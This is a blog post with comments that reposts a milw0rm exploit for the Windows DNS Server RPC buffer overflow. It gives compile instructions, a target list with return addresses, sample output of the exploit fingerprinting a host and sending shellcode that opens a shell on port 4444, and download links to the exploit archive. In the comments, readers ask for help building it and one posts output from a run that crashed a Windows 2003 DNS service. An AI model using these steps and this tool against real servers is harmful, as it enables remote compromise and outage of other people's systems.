MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2

鬼仔's note: v2
Some readers commented that they don't know how to compile this, so here is how to build it with the Makefile under VC:
Run cmd.exe
Change into the vc/bin directory
Run vcvars32.bat
Change into the directory containing the makefile
nmake /f makefile

Source: milw0rm

Exploit v2 features:
– Targets remote port 445 (by default, but requires authentication)
– Manual target for the dynamic TCP port (without authentication)
– Automatic search for the dynamic DNS RPC port
– Local and remote OS fingerprinting (auto target)
– Windows 2000 Server and Windows 2003 Server (Spanish) supported by default
– Fixed bug with the Windows 2003 shellcode
– Universal local exploit for Win2k (automatic search for opcodes)
– Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
– Added targets for remote Win2k English and Italian (not tested; found with the Metasploit opcode database, please report your own)
– Microsoft RPC API used (who cares? :p)

D:\Programación\DNSTEST>dnstest
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

Usage: dnstest -h 127.0.0.1 (Universal local exploit)
dnstest -h host [-t id] [-p port]
Targets:
0 (0x30270b0b) – Win2k3 server SP2 Universal – (default for win2k3)
1 (0x79467ef8) – Win2k server SP4 Spanish – (default for win2k )
2 (0x7c4fedbb) – Win2k server SP4 English
3 (0x7963edbb) – Win2k server SP4 Italian
4 (0x41414141) – Windows all Denial of Service

D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444

also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip
http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip

# milw0rm.com [2007-04-18]

  • 719100

    How do I turn this into v.exe?

  • enterbd

    It's easy: run midl on it, then nmake, and you're done.

  • enterbd

    How have you been lately, 鬼仔?

  • 鬼仔

    I've added the build steps to the post.

    to enterbd: Not bad, same as always.

  • 卡卡卡

    :cry: Couldn't get it to compile under VS8.

  • 719100

    Thanks :lol:

  • 鬼仔

    VS8?

  • 3389

    Tested against the Chinese edition of 2003 and got the following output:
    E:\>dnstest -h 192.168.1.109
    ————————————————————–
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    ————————————————————–

    [+] Trying to fingerprint target.. (05.02)
    [+] Remote Host identified as Windows 2003
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp:192.168.1.109
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:192.168.1.109[1047]
    [+] Dynamic DNS rpc port found (1047)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.109[1047]
    [+] RpcBindingFromStringBinding success
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444
    [-] RPC Server reported exception 0x6be = 1726
    [-] Looks like remote RPC server crashed :/

    Also, the server's DNS service failed and port 53 is closed. What's going on here? Please advise.

  • 鬼仔

    The overflow succeeded, but the connection failed.
